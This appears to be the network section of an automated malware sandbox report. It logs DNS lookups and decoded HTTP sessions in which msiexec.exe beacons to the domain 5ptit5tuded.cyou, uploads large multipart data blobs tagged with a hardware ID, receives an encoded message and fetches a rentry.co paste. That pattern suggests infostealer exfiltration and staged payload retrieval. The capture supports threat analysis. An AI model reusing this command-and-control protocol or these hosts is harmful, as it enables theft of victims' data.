                                                                                                                                                            Nov 19, 2024 20:06:41.579662085 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.585450888 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.585484028 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.586447001 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.586457014 CET44349718172.67.75.40192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 19, 2024 20:06:23.623641968 CET | 59474 | 53 | 192.168.2.8 | 1.1.1.1
Nov 19, 2024 20:06:23.664984941 CET | 53 | 59474 | 1.1.1.1 | 192.168.2.8
Nov 19, 2024 20:06:40.986819029 CET | 63710 | 53 | 192.168.2.8 | 1.1.1.1
Nov 19, 2024 20:06:40.997049093 CET | 53 | 63710 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 19, 2024 20:06:23.623641968 CET | 192.168.2.8 | 1.1.1.1 | 0x20c1 | Standard query (0) | 5ptit5tuded.cyou | A (IP address) | IN (0x0001) | false
Nov 19, 2024 20:06:40.986819029 CET | 192.168.2.8 | 1.1.1.1 | 0xe7d2 | Standard query (0) | rentry.co | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 19, 2024 20:06:23.664984941 CET | 1.1.1.1 | 192.168.2.8 | 0x20c1 | No error (0) | 5ptit5tuded.cyou | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 19, 2024 20:06:23.664984941 CET | 1.1.1.1 | 192.168.2.8 | 0x20c1 | No error (0) | 5ptit5tuded.cyou | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 19, 2024 20:06:40.997049093 CET | 1.1.1.1 | 192.168.2.8 | 0xe7d2 | No error (0) | rentry.co | | 172.67.75.40 | A (IP address) | IN (0x0001) | false
Nov 19, 2024 20:06:40.997049093 CET | 1.1.1.1 | 192.168.2.8 | 0xe7d2 | No error (0) | rentry.co | | 104.26.3.16 | A (IP address) | IN (0x0001) | false
Nov 19, 2024 20:06:40.997049093 CET | 1.1.1.1 | 192.168.2.8 | 0xe7d2 | No error (0) | rentry.co | | 104.26.2.16 | A (IP address) | IN (0x0001) | false
                                                                                                                                                            • 5ptit5tuded.cyou
                                                                                                                                                            • rentry.co
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49709 | 188.114.97.3 | 443 | 6840 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 19:06:24 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 8
                                                                                                                                                            Host: 5ptit5tuded.cyou
2024-11-19 19:06:24 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                            Data Ascii: act=life
2024-11-19 19:06:24 UTC | 980 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 19 Nov 2024 19:06:24 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=g47ql9n6nc8a2ign2h46flfv99; expires=Sat, 15-Mar-2025 12:53:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BC7zW5chBelkx7f6PRB2UWIzHx8ww4z06XxuNtmjHa%2B7ptGfenreZCUmsTqoEXM4MlTrMuGaRBFwibnjb7GsZ5odKymekWLpDqzYUzIEeDY6WApX0appAxeHYTIXCmVy4b9G"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8e527a2dfce642ec-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1635&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1745367&cwnd=193&unsent_bytes=0&cid=625ce66288e47eea&ts=468&x=0"
2024-11-19 19:06:24 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                            Data Ascii: 2ok
2024-11-19 19:06:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49710 | 188.114.97.3 | 443 | 6840 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 19:06:26 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 50
                                                                                                                                                            Host: 5ptit5tuded.cyou
2024-11-19 19:06:26 UTC | 50 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 35 26 6a 3d
                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl10vs05&j=
2024-11-19 19:06:27 UTC | 980 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 19 Nov 2024 19:06:27 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=bk1huiq5kokv5f0oo1bcrd5jrm; expires=Sat, 15-Mar-2025 12:53:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1J6e0Q8BpAcJB7YTrZPfgN8gLczUqc5HUbmNIO1tnkU8jl44I60QNFzt3tT4u1d3U0nh5xJPSRwwYrQgCeLJr5FLK%2B3EddeGgeCtkqO7QjltM2epmpG2UnrUu9G6dDKuYjL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8e527a3e1ff28c6b-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1849&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=950&delivery_rate=1575822&cwnd=140&unsent_bytes=0&cid=33edda2a995f762f&ts=714&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49712 | 188.114.97.3 | 443 | 6840 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 19:06:30 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: multipart/form-data; boundary=15SYDMEWXHQKVCM
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 12831
                                                                                                                                                            Host: 5ptit5tuded.cyou
2024-11-19 19:06:30 UTC | 12831 | OUT | Data Raw: 2d 2d 31 35 53 59 44 4d 45 57 58 48 51 4b 56 43 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 46 44 37 38 34 43 45 46 45 41 45 34 41 43 45 31 46 36 38 31 34 42 31 36 44 35 41 31 39 43 0d 0a 2d 2d 31 35 53 59 44 4d 45 57 58 48 51 4b 56 43 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 35 53 59 44 4d 45 57 58 48 51 4b 56 43 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 35 0d 0a 2d 2d 31 35
                                                                                                                                                            Data Ascii: --15SYDMEWXHQKVCMContent-Disposition: form-data; name="hwid"7AFD784CEFEAE4ACE1F6814B16D5A19C--15SYDMEWXHQKVCMContent-Disposition: form-data; name="pid"2--15SYDMEWXHQKVCMContent-Disposition: form-data; name="lid"MeHdy4--pl10vs05--15
2024-11-19 19:06:30 UTC | 995 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 19 Nov 2024 19:06:30 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=j6mcuemrtbns12t8v6c5k02um5; expires=Sat, 15-Mar-2025 12:53:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ccQLoK75bw5RuVmntQM%2BUltN231zPfMkOngHpwCQxrIUO%2B336HBbY19j4honMpFIro3L8Sfar1R%2Bu%2BdxzJRJlMEKcE%2FoBuDLNvaX%2BcVSjMzhB104yhvWDfMMKj7dbB1pin%2Bw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8e527a540f4842e7-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1671&sent=7&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13768&delivery_rate=1695702&cwnd=237&unsent_bytes=0&cid=0837be77302243d6&ts=712&x=0"
2024-11-19 19:06:30 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
Data Ascii: e ok 8.46.123.75
2024-11-19 19:06:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49713 | 188.114.97.3 | 443 | 6840 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 19:06:31 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: multipart/form-data; boundary=VOHK04ZTITUZBUUF
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 15066
                                                                                                                                                            Host: 5ptit5tuded.cyou
2024-11-19 19:06:31 UTC | 15066 | OUT | Data Ascii: --VOHK04ZTITUZBUUF Content-Disposition: form-data; name="hwid" 7AFD784CEFEAE4ACE1F6814B16D5A19C --VOHK04ZTITUZBUUF Content-Disposition: form-data; name="pid" 2 --VOHK04ZTITUZBUUF Content-Disposition: form-data; name="lid" MeHdy4--pl10vs05 -
2024-11-19 19:06:33 UTC | 986 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 19 Nov 2024 19:06:33 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=r4cif6cnrats32q2ngjd99hddu; expires=Sat, 15-Mar-2025 12:53:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nLwvWYGTruYsRpgBwVYQDknqiiRsGQNNeqhOeu1sSMTHkqLnfYMxsUQt8ENDUw3fm57Qy0Pl8d1VevNoszBXx1Q6IWOqPz%2BDKsra%2BDw3FWyBIqNeA0dJPjQZPXA1rxThrjtL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8e527a5befedc413-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1698&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2838&recv_bytes=16004&delivery_rate=1649717&cwnd=173&unsent_bytes=0&cid=541201e289b08d8e&ts=2387&x=0"
2024-11-19 19:06:33 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
Data Ascii: e ok 8.46.123.75
2024-11-19 19:06:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49714 | 188.114.97.3 | 443 | 6840 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 19:06:34 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: multipart/form-data; boundary=INXXJSED9RCD5XIT
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 20233
                                                                                                                                                            Host: 5ptit5tuded.cyou
2024-11-19 19:06:34 UTC | 15331 | OUT | Data Ascii: --INXXJSED9RCD5XIT Content-Disposition: form-data; name="hwid" 7AFD784CEFEAE4ACE1F6814B16D5A19C --INXXJSED9RCD5XIT Content-Disposition: form-data; name="pid" 3 --INXXJSED9RCD5XIT Content-Disposition: form-data; name="lid" MeHdy4--pl10vs05 -
2024-11-19 19:06:35 UTC | 990 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 19 Nov 2024 19:06:35 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=3d1sg5oska84c8cf583qdvlalv; expires=Sat, 15-Mar-2025 12:53:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mNGxNifdkjsztpZGOwjGUId2Hg%2FLgEw4lzYmV3FOkK4TrhnsWc7zU7xeJ6XO56I0rBw4jDz5m0OlFd%2FZGyXoWXZkVr5O8HX8%2FUwpO8rDMfvDu4yiFqkzoYJdHp%2BEbT4aSppc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8e527a6f68744333-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2248&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21193&delivery_rate=1336996&cwnd=248&unsent_bytes=0&cid=49f410f56bf3e82c&ts=536&x=0"
2024-11-19 19:06:35 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
Data Ascii: e ok 8.46.123.75
2024-11-19 19:06:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49715 | 188.114.97.3 | 443 | 6840 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 19:06:36 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: multipart/form-data; boundary=UXYS3DE3NDB
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 1165
                                                                                                                                                            Host: 5ptit5tuded.cyou
2024-11-19 19:06:36 UTC | 1165 | OUT | Data Ascii: --UXYS3DE3NDB Content-Disposition: form-data; name="hwid" 7AFD784CEFEAE4ACE1F6814B16D5A19C --UXYS3DE3NDB Content-Disposition: form-data; name="pid" 1 --UXYS3DE3NDB Content-Disposition: form-data; name="lid" MeHdy4--pl10vs05 --UXYS3DE3NDB C
2024-11-19 19:06:36 UTC | 985 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 19 Nov 2024 19:06:36 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=0qoi2tm97pbieudb6ntgegu6if; expires=Sat, 15-Mar-2025 12:53:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rwsk8Xbdx2eiYlXSvFW3WXSjaxuis4wFvcBZL3EaQMNi5XDMF%2BUX6z43GggOnObfucCHnlROEDrdNASGXlR9cBaFnKiCWSOeAOsPYQrLL2tXz91P9UhWyjiPus%2BWEtAxCG1%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8e527a7a8efb189d-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1686&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2075&delivery_rate=1672394&cwnd=176&unsent_bytes=0&cid=c811e37fe1067fda&ts=379&x=0"
2024-11-19 19:06:36 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
Data Ascii: e ok 8.46.123.75
2024-11-19 19:06:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49716 | 188.114.97.3 | 443 | 6840 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 19:06:37 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: multipart/form-data; boundary=DS3RNFCGQUM26
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 207903
                                                                                                                                                            Host: 5ptit5tuded.cyou
2024-11-19 19:06:37 UTC | 15331 | OUT | Data Ascii: --DS3RNFCGQUM26 Content-Disposition: form-data; name="hwid" 7AFD784CEFEAE4ACE1F6814B16D5A19C --DS3RNFCGQUM26 Content-Disposition: form-data; name="pid" 1 --DS3RNFCGQUM26 Content-Disposition: form-data; name="lid" MeHdy4--pl10vs05 --DS3RNFCG
2024-11-19 19:06:39 UTC | 992 | IN | HTTP/1.1 200 OK
Date: Tue, 19 Nov 2024 19:06:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=67rmg5tpoioqukvp3pnf0ueuap; expires=Sat, 15-Mar-2025 12:53:18 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SoY%2FXBJ2JLdaIOBzFv%2FytY48p%2F8KwMAgZiJbCPxDkcC6RsmPBikpBkcjOjE5Fe1xyiMrIQ0Serphr1CruL8aMWp0vAlotblT3Kl1TV1h5Or6wra9rJnwLOtQEOrM%2B4g4amBP"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e527a830fcd7c90-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1815&sent=75&recv=218&lost=0&retrans=0&sent_bytes=2839&recv_bytes=209411&delivery_rate=1602634&cwnd=32&unsent_bytes=0&cid=3dda8e2a3738f68c&ts=1937&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49717 | 188.114.97.3 | 443 | 6840 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 19:06:40 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 85
Host: 5ptit5tuded.cyou
2024-11-19 19:06:40 UTC | 85 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 35 26 6a 3d 26 68 77 69 64 3d 37 41 46 44 37 38 34 43 45 46 45 41 45 34 41 43 45 31 46 36 38 31 34 42 31 36 44 35 41 31 39 43
Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl10vs05&j=&hwid=7AFD784CEFEAE4ACE1F6814B16D5A19C
2024-11-19 19:06:40 UTC | 988 | IN | HTTP/1.1 200 OK
Date: Tue, 19 Nov 2024 19:06:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=l894mdm30b589mqfk80o60uiqg; expires=Sat, 15-Mar-2025 12:53:19 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jQJS5k4mQwrus615%2BZHQG80fxnc7lRA8g3DIGjb3l5oiZHCpoezS%2BCGeYQAUZfzB1BJFJUhNuyRy%2F6JPlg9MpOaRUDGsBljkgha6PAk40N%2F%2BfjdeZpNeMiD9TpHkH02ZdEoZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e527a93ff7b4282-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1826&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=985&delivery_rate=1586956&cwnd=252&unsent_bytes=0&cid=1ccd173a98481081&ts=422&x=0"
2024-11-19 19:06:40 UTC | 126 | IN | Data Raw: 37 38 0d 0a 52 57 38 4a 6d 67 30 6d 55 50 2b 6f 78 42 75 36 57 31 67 43 56 7a 56 57 41 39 7a 59 61 65 6c 62 59 55 69 62 64 58 6e 72 34 6c 63 65 46 43 76 76 4c 78 78 79 6c 39 79 77 61 38 6c 68 42 43 30 4c 47 69 52 6d 73 71 77 62 6b 48 55 43 4a 38 64 61 48 34 36 4e 49 69 41 59 62 4b 39 52 43 53 4b 65 33 2b 59 33 6d 44 30 73 49 47 30 48 65 69 47 35 2b 6c 50 5a 4a 6a 77 3d 0d 0a
Data Ascii: 78RW8Jmg0mUP+oxBu6W1gCVzVWA9zYaelbYUibdXnr4lceFCvvLxxyl9ywa8lhBC0LGiRmsqwbkHUCJ8daH46NIiAYbK9RCSKe3+Y3mD0sIG0HeiG5+lPZJjw=
2024-11-19 19:06:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49718 | 172.67.75.40 | 443 | 6840 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 19:06:41 UTC | 196 | OUT | GET /feouewe5/raw HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: rentry.co
2024-11-19 19:06:41 UTC | 1279 | IN | HTTP/1.1 403 Forbidden
Date: Tue, 19 Nov 2024 19:06:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 8771
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
